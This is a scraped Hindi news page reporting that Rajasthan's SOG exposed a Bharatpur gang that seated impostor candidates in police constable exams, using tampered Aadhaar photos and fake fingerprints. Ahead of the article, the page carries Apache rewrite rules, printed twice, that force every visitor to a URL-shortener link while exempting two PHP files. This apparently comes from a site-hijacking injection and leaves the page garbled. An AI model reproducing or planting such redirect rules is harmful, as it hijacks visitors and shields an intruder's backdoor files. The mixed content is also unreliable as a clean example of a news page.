
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 351
Nextभरतपुर। एसओजी ने पुलिस कांस्टेबल भर्ती परीक्षा में नकल कराने वाले भरतपुर से संचालित गिरोह का पर्दाफाश किया है। राजस्थान पुलिस मुख्यालय के नेतृत्व में चलाए जा रहे विशेष ऑपरेशन में खुलासा हुआ है कि इस गैंग का संचालक प्रतियोगी परीक्षाओं में फर्जी अभ्यर्थी बिठाकर वास्तविक अभ्यर्थियों से पांच से दस लाख रुपए की रकम ऐंठते थे। भरतपुर से संचालित होने वाले इस गैंग के सरगना वास्तविक अभ्यर्थी और परीक्षा में बैठने वाले फर्जी अभ्यर्थियों के आधार कार्ड की फोटोकॉपी में लगे फोटो के साथ छेड़छाड़ करते पकड़े गए हैं। इसके अलावा परीक्षा केन्द्र पर फिंगर प्रिंट के मिलान के लिए फिश फैट से फर्जी फिंगर प्रिंट तैयार करने का खुलासा एसओजी की कार्रवाई में सामने आया है। इस गैंग के सरगना नरेश सिनसिनवार और जितेन्द्र सिनसिनवार के रूप में सामने आए हैं। गैंग संचालकों ने राजस्थान के कई परीक्षा केन्द्रों पर अलग-अलग फर्जी अभ्यर्थियों को शामिल करवाया है। इसी गैंग द्वारा अलवर में परीक्षा केन्द्र पर एक अन्य अभ्यर्थी को बिठाया जा रहा था लेकिन वास्तविक अभ्यर्थी और फर्जी अभ्यर्थी की उम्र में अंतर ज्यादा होने के कारण परीक्षा में शामिल नहीं हो सका। पुलिस मुख्यालय के निर्देश पर संयुक्त ऑपरेशन में अलवर, जयपुर के साथ साथ कई जिलों में नाकेबंदी करवाकर फर्जी अभ्यर्थियों की धरपकड़ के लिए अभियान जारी है।